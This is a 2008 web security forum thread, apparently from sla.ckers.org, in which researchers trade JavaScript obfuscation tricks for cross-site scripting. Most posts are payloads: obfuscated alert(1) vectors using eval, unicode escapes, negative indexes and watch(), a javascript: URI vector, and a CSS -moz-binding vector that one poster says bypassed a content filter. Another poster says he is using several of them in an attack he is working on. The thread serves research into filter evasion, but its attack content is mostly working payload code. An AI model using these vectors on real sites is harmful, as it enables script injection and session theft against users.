@Gareth: Hmm - I think you misunderstood me - please test both code snippets to know what I mean in this particular case :)

@asilvermtzion: Your nick seems to indicate excellent taste in musics ;)



Edited 1 time(s). Last edit at 03/07/2008 02:57AM by .mario.

@mario

Sorry mate I must have been tired last night :)
I've tested it and it appears that because there's no ";" in the second example it executes the alert statement without assigning it to "i". If you remove the first statement then the second doesn't execute because it has no reference to i.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

@asilvermtzion

Yeah what fragge said, I was messing round with -2,-3,-4 etc inspired from DoctorDan's reg exp trick and John Resig's find on IE. Here's the code I created to find the properties:-

function inspectObject(obj) {
 var prop;
 var props = [];
 for(var i=-1000;i<1000;i++) {
  if(i > 0) {
     prop = obj[String.fromCharCode(i)];
     if(prop != null) {
      props.push(String.fromCharCode(i) + '=' + prop);
     }  
  } else {
     prop = obj;
     if(prop != null) {
      props.push(i + '=' + prop);
    }
  }
 }
 return props;
}
 
x=function x(){};
alert(inspectObject(x));

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 03/07/2008 06:36AM by Gareth Heyes.

lol mario :) it's quite unusual that people understand my nick

thats interesting gareth, so in terms of compatibility i guess it's ie only?

@asilvermtzion

I've only tested it on Firefox but it could work on IE. As far as I know it doesn't work on Safari or Opera

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

javascript:{http://%0A(%46un%63\u0074ion%0C(('\u0061le%72t((1))'))%0A())()}

http://phpfi.com/301681

This one kind of messes up the BBCode parser... Just ignore the [ tags.]

And another one - playing with the negative indexes

try{c=/wtf/[-5]+'rt(/#/[-2])',a}catch(b){b.eval(c.replace(/[fs]/g,''))}

Just toying around...

with(URIError[-5-0e0])eval(/./.eval((false.toString()).replace(/[fs]/g,'')+'rt('+1e0+')'))

slight rephrase of this question, say you had an object and wanted to access a property (indice) without using square brackets, are there any elegant methods of access?



Edited 3 time(s). Last edit at 03/12/2008 06:34PM by asilvermtzion.

@asilvermtzion:

I dunno exactly what you mean - maybe it's related to this?

window['alert'](1)
window.alert(1)

var array = [1,2,3]
alert(array.pop(3))
for (i in array) alert(i)

alert(\u005b1,2,3,4,5\u005d)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 03/13/2008 04:38AM by Gareth Heyes.

And of course

{µ=String.fromCharCode;eval('alert('+µ(91)+'1,2,3,4,5'+µ(93)+')')}

;)



Edited 1 time(s). Last edit at 03/13/2008 08:05AM by .mario.

@mario

Hehe we could go on :) I think the point is that there's plenty of ways

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

We need a new challenge :)

This is the greatest thread known to man :) I've used at least four individual vectors in the current attack I'm working on!

@asilvermtzion

You obviously haven't seen this thread lol:-
http://sla.ckers.org/forum/read.php?11,1383

@mario

Yeah we need a new challenge....

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

can someone try obfuscating String.fromCharCode? Not having any luck with it



Edited 3 time(s). Last edit at 03/13/2008 09:34AM by asilvermtzion.

Seen as I had nothing else to do:-
http://www.businessinfo.co.uk/labs/hackvertor/hackvertor.php?input=YWxlcnQoPEB1bmlfMShcdSk%2BU3RyaW5nLmZyb21DaGFyQ29kZTxAL3VuaV8xPig8QHRvY2hhcmNvZGVzXzA%2BWFNTPEAvdG9jaGFyY29kZXNfMD4pKQphbGVydChldmFsKCc8QGhleF8yPlN0cmluZy5mcm9tQ2hhckNvZGUoPEB0b2NoYXJjb2Rlc18yPlhTUzxAL3RvY2hhcmNvZGVzXzI%2BKTxAL2hleF8yPicpKQ%3D%3D

You really need to learn how to use my tool Hackvertor if you're having trouble with obfuscation.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Or another quick and easy way to get an R

{a=(typeof (/./[-1])),b=a.replace(/s/,(a[0]).toUpperCase()),self['ev'+'al'](b+'.'+'fromµharµode'.replace(/µ/g,'C')+'(1e0*82)')}

basically you can obfuscate anything in JS - especially when working with eval().

@mario

Nice! :)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

thats great, thanks btw gareth - ive been using hackvertor a fair bit. i had a slight problem here as i was unable to use any single/double quotes and there were some regex irregularities when you nest evals.

@asilvermtzion

Cool, if you've found some problems please could you post to the thread and then I'll be happy to fix them. Preferably some example urls as well, please post to here:-
http://sla.ckers.org/forum/read.php?12,17908

Thanks!

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

JS Multiline fun:-

eval(\u002fale\
rt(1)/[-1].replace(/\\|\n/g,''));

eval("aler\
t(1)")

eval(\u0022aler\
t(1)")

eval(\u0027aler\
t(1)')

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

\u002f**/alert(1)\u002f**/

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Cool, Gareth! Why wont this work when you rearrange it: /**\u002falert(1)\u002f**/
It would be neat- would make the alert look like it's commented out.

-Dan

Inspired by Gareth's post:

find(function(){alert(1,find())}());

@Dan

The Javascript parsing engine (in FF at least) raises an error if the ending marker is not plain text :( This means that any comments, regular expressions or strings must end with a valid marker.

e.g.
--Valid--
\u0027test';
\u0022test";
\u002ftest/;
\u002f/test
\u002f**/alert(1)

--Invalid--
'test\u0027;
"test\u0022;
/test\u002f;
/\u002ftest
/**\u002falert(1)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

I have not really read the 8 pages of this thread so I'm hoping this hasn't been posted, but what I recently stumbled upon on while reading about the CSS syntax in the hope of making an exploit possible is the fact that a backslash followed by the hex number of a character in CSS will replace this character to just like a real one.

that way I was able to bypass the content filter, and thus create the following vector:

<style> BODY{-moz\00002dbinding:url(URL)} </style>

this is also quite useful for bypassing blocked characters.

with(this)watch('XSS',alert),XSS=false

and

this.watch('_',function(){return eval});
window.watch('a',function(a){return a+'lert'});
this._=window.a=null;
_(a)(1);

a+'lert'=='alert'? Sure!
-Dan



Edited 1 time(s). Last edit at 05/14/2008 06:23AM by DoctorDan.

@DoctorDan: well that's plain fun. :)

-tx @ lowtech-labs.org